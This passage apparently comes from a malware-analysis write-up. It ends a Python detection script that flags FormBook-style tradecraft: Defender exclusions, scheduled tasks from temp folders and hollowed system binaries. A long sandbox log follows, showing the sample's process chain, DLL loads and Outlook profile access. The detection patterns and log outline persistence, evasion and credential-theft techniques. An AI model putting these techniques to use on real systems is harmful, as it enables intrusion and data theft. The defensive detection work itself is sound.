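        name, cl = _name(ev.child), ev.cmdline.lower()
        if name == "powershell.exe" and re.search(r"add-mppreference\s+-exclusion", cl):
            hits.append(("defender_exclusion", ev.child))
        if name == "schtasks.exe" and "/create" in cl and "/xml" in cl and any(t in cl for t in TEMP_DIRS):
            hits.append(("schtask_from_temp", ev.child))
        if (_in_windows(ev.child) and ev.parent != "unknown"
                and not _in_windows(ev.parent) and _bare_image(ev)):
            hits.append(("hollowed_lolbin", ev.child))
        if name in BROWSERS and _in_windows(ev.parent):
            hits.append(("browser_from_system_binary", ev.child))
    return hits


def summarize(events) -> dict[str, int]:
    return dict(Counter(rule for rule, _ in triage(events)))


if __name__ == "__main__":
    for rule, child in triage(SAMPLE_EVENTS):
        print(f"{rule:28} {child}")
```

The hollowing rule deliberately keys on the absence of arguments plus a parent outside C:\Windows rather than on RegSvcs.exe by name, so it also catches the EhStorAuthn.exe stage and the other .NET and SysWOW64 hosts FormBook rotates through; feed it Sysmon Event ID 1 or Windows 4688 records with the same three fields to run it against real telemetry.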
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: 0t7MXNEfCg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 0t7MXNEfCg.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: 0t7MXNEfCg.exeStatic file information: File size 1088520 > 1048576
                Source: 0t7MXNEfCg.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x105a00
                Source: 0t7MXNEfCg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: EhStorAuthn.pdbGCTL source: RegSvcs.exe, 00000007.00000002.1092861532.0000000000948000.00000004.00000020.00020000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000002.3312326160.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: EhStorAuthn.exe, 0000000F.00000002.3312040086.000000000355A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.000000000576C000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158675658.00000000033BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1394289093.000000001313C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000007.00000002.1093299321.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1092408126.0000000004DED000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1094405634.0000000004F95000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.0000000005140000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.1093299321.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1092408126.0000000004DED000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1094405634.0000000004F95000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.0000000005140000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 00000007.00000002.1092861532.0000000000948000.00000004.00000020.00020000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000002.3312326160.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: EhStorAuthn.exe, 0000000F.00000002.3312040086.000000000355A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.000000000576C000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158675658.00000000033BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1394289093.000000001313C000.00000004.80000000.00040000.00000000.sdmp
